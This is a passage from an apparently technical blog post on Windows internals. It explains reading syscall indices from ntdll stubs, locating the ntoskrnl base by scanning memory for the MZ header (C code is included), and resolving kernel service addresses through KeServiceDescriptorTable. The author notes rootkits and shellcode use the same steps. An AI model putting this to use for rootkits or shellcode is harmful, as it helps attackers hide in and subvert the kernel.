8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 04 00                          retn    4

These are a few snippets to show you how the syscall function templates look like. They are generated automatically by some tool MS wrote and they don’t change a lot as you can see from the various architectures I gathered here. Anyway, if you take a look at the bytes block of each function, you will see that you can easily spot the correct place where you can read the index of the syscall we are going to use. That’s why doing a diff on two functions from the same .dll would work well and reliably. Needless to say that we are going to use the index number we get with the table inside the kernel in order to get the corresponding function in the kernel.

This technique gives us the index number of the syscall of any exported function in any one of the .dlls mentioned above. This is valid both for 32 and 64 bits. And by the way, notice that the operand type (=immediate) that represents the index number is always a 4 bytes integer (dword) in the ‘mov’ instruction, just makes life easier.

To the next task, in order to find the base address of the service table or what is known as the system service descriptor table (in short SSDT), we will have to get the base address of the ntoskrnl.exe image first. There might be different kernel image loaded in the system (with or without PAE, uni-processor or multi-processor), but it doesn’t matter in the following technique I’m going to use, because it’s based on memory and not files… This task is really easy when you are a driver, means that if you want some exported symbol from the kernel that the DDK supplies – the PE loader will get it for you. So it means we get, without any work, the address of any function like NtClose or NtCreateFile, etc. Both are inside ntos, obviously. Starting with that address we will round down the address to the nearest page and scan downwards to find an ‘MZ’ signature, which will mark the base address of the whole image in memory. If you’re afraid from false positives using this technique you’re welcome to go further and check for a ‘PE’ signature, or use other techniques.

This should do the trick:

PVOID FindNtoskrnlBase(PVOID Addr)
{
    /// Scandown from a given symbol's address.
    Addr = (PVOID)((ULONG_PTR)Addr & ~0xfff);
    __try {
        while ((*(PUSHORT)Addr != IMAGE_DOS_SIGNATURE)) {
            Addr = (PVOID) ((ULONG_PTR)Addr - PAGE_SIZE);
        }
        return Addr;
    }
    __except(1) { }
    return NULL;
}

And you can call it with a parameter like FindNtoskrnlBase(ZwClose). This is what I meant that you know the address of ZwClose or any other symbol in the image which will give you some “anchor”.

After we got the base address of ntos, we need to retrieve the address of the service table in kernel. That can be done using the same GetProcAddress we used earlier on the mapped user mode .dll files. But this time we will be looking for the “KeServiceDescriptorTable” exported symbol.

So far you can see that we got anchors (what I call for a reliable way to get an address of anything in memory) and we are good to go, this will work in production without the need to worry. If you wanna start the flame war about the unlegitimate use of undocumented APIs, etc. I’m clearly not interested. :)
Anyway, in Windows 32 bits, the latter symbol is exported, but it is not exported in 64 bits! This is part of the PatchGuard system, to make life harder for rootkits, 3rd party drivers doing exactly what I’m talking about, etc. I’m not going to cover how to get that address in 64 bits in this post.

The KeServiceDescriptorTable is a table that holds a few pointers to other service tables which contain the real addresses of the service functions the OS supplies to usermode. So a simple dereference to the table and you get the pointer to the first table which is the one you are looking for. Using that pointer, which is really the base address of the pointers table, you use the index we read earlier from the required function and you got, at last, the pointer to that function in kernel, which you can now use.

The bottom line is that now you can use any API that is given to usermode also in kernelmode and you’re not limited to a specific Windows version, nor updates, etc. and you can do it in a reliable manner which is the most important thing. Also we didn’t require any special algorithms nor disassemblers (as much as I like diStorm…). Doing so in shellcodes make life a bit harder, because we had the assumption that we got some reliable way to find the ntos base address. But every kid around the block knows it’s easy to do it anyway.

Happy coding :)

References I found interesting about this topic:
http://j00ru.vexillium.org/?p=222
http://alter.org.ua/docs/nt_kernel/procaddr/

http://uninformed.org/index.cgi?v=3&a=4&p=5

And how to do it in 64 bits:

http://www.gamedeception.net/threads/20349-X64-Syscall-Index